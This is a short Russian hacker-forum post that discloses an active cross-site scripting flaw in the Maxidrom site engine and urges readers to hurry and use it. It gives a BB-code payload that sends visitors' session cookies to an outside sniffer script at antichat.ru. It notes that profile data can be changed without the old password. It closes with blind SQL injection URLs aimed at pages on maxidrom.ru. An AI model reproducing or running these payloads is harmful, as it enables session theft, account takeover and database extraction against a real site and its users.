Обнаружена активная хсс в движке Максидрома. Нет проверки спаренных ВВ-тегов: PHP: [email]re@re[url=http://www.re.com'='][/url].com[/email] ' style='background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)' В опере не пашет, в FF не проверял. Время сессии - сутки. Торопитесь =] Пара коментов: - отутствеует всякая проверка на регистрацию - отсутствует ретрив пароля на мыло(если забыл - твои проблемы) - можно сменить ЛЮБЫЕ данные в профиле БЕЗ ввода старого пароля, для смены пароля нужно знать старый
http://www.maxidrom.ru/howwas/?y=2555+order+by+9-- http://www.maxidrom.ru/howwas/?y=2555&a=2558+order+by+9-- http://www.maxidrom.ru/popfoto.aspx?cid=2571+and(ascii(substring(@@version,1,1))>1)-- юнион не выводит, так что только substring. жаль форум у них умер..
